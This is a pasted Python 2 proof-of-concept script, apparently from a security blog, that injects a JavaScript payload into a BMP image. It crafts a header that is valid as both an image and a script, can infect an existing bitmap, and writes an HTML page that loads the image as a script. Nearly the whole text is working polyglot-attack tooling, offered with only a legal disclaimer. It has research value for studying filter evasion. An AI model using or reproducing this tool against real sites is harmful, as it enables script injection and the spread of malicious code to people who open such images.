SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/env python2 | |
2 | #============================================================================================================# | |
3 | #======= Simply injects a JavaScript Payload into a BMP. ====================================================# | |
4 | #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================# | |
5 | #======= Author: marcoramilli.blogspot.com ==================================================================# | |
6 | #======= Version: PoC (don't even think to use it in development env.) ======================================# | |
7 | #======= Disclaimer: ========================================================================================# | |
8 | #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR | |
9 | #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
10 | #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
11 | #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, | |
12 | #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
13 | #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
14 | #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) | |
15 | #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, | |
16 | #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING | |
17 | #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
18 | #POSSIBILITY OF SUCH DAMAGE. | |
19 | #===========================================================================================================# | |
20 | import argparse | |
21 | import os | |
22 | ||
23 | #--------------------------------------------------------- | |
24 | def _hexify(num): | |
25 | """ | |
26 | Converts and formats to hexadecimal | |
27 | """ | |
28 | num = "%x" % num | |
29 | if len(num) % 2: | |
30 | num = '0'+num | |
31 | return num.decode('hex') | |
32 | ||
33 | #--------------------------------------------------------- | |
34 | #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"] | |
35 | #;alert(_0xe428[0]);" | |
36 | def _generate_and_write_to_file(payload, fname): | |
37 | """ | |
38 | Generates a fake but valid BMP within scriting | |
39 | """ | |
40 | f = open(fname, "wb") | |
41 | header = (b'\x42\x4D' #Signature BM | |
42 | b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header | |
43 | b'\x00\x00\x00\x00' #Reserved | |
44 | b'\x00\x00\x00\x00' #bitmap data offset | |
45 | b''+ _hexify( len(payload) ) + #bitmap header size | |
46 | b'\x00\x00\x00\x14' #width 20pixel .. it's up to you | |
47 | b'\x00\x00\x00\x14' #height 20pixel .. it's up to you | |
48 | b'\x00\x00' #nb_plan | |
49 | b'\x00\x00' #nb per pixel | |
50 | b'\x00\x10\x00\x00' #compression type | |
51 | b'\x00\x00\x00\x00' #image size .. its ignored | |
52 | b'\x00\x00\x00\x01' #Horizontal resolution | |
53 | b'\x00\x00\x00\x01' #Vertial resolution | |
54 | b'\x00\x00\x00\x00' #number of colors | |
55 | b'\x00\x00\x00\x00' #number important colors | |
56 | b'\x00\x00\x00\x80' #palet colors to be complient | |
57 | b'\x00\x80\xff\x80' #palet colors to be complient | |
58 | b'\x80\x00\xff\x2A' #palet colors to be complient | |
59 | b'\x2F\x3D\x31\x3B' #*/=1; | |
60 | ) | |
61 | # I made this explicit, step by step . | |
62 | f.write(header) | |
63 | f.write(payload) | |
64 | f.close() | |
65 | return True | |
66 | ||
67 | #--------------------------------------------------------- | |
68 | def _generate_launching_page(f): | |
69 | """ | |
70 | Creates the HTML launching page | |
71 | """ | |
72 | ||
73 | htmlpage =""" | |
74 | <html> | |
75 | <head><title>Opening an image</title> </head> | |
76 | <body> | |
77 | <img src=\"""" + f + """\"\> | |
78 | <script src= \"""" + f + """\"> </script> | |
79 | </body> | |
80 | </html> | |
81 | """ | |
82 | html = open("run.html", "wb") | |
83 | html.write(htmlpage); | |
84 | html.close() | |
85 | return True | |
86 | ||
87 | #--------------------------------------------------------- | |
88 | def _inject_into_file(payload, fname): | |
89 | """ | |
90 | Injects the payload into existing BMP | |
91 | NOTE: if the BMP contains \xFF\x2A might caouse issues | |
92 | """ | |
93 | # I know, I can do it all in memory and much more fast. | |
94 | # I wont do it here. | |
95 | f = open(fname, "r+b") | |
96 | b = f.read() | |
97 | b.replace(b'\x2A\x2F',b'\x00\x00') | |
98 | f.close() | |
99 | ||
100 | f = open(fname, "w+b") | |
101 | f.write(b) | |
102 | f.seek(2,0) | |
103 | f.write(b'\x2F\x2A') | |
104 | f.close() | |
105 | ||
106 | f = open(fname, "a+b") | |
107 | f.write(b'\xFF\x2A\x2F\x3D\x31\x3B') | |
108 | f.write(payload) | |
109 | f.close() | |
110 | return True | |
111 | ||
112 | ||
113 | #--------------------------------------------------------- | |
114 | if __name__ == "__main__": | |
115 | parser = argparse.ArgumentParser() | |
116 | parser.add_argument("filename",help="the bmp file name to be generated/or infected") | |
117 | parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"") | |
118 | parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap") | |
119 | args = parser.parse_args() | |
120 | print(""" | |
121 | |======================================================================================================| | |
122 | | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. | | |
123 | | It is the end user's responsibility to obey all applicable local, state and federal laws. | | |
124 | | Authors assume no liability and are not responsible for any misuse or damage caused by this program | | |
125 | |======================================================================================================| | |
126 | """) | |
127 | if args.inject_to_existing_bmp: | |
128 | _inject_into_file(args.js_payload, args.filename) | |
129 | else: | |
130 | _generate_and_write_to_file(args.js_payload, args.filename) | |
131 | ||
132 | _generate_launching_page(args.filename) | |
133 | print "[+] Finished!" |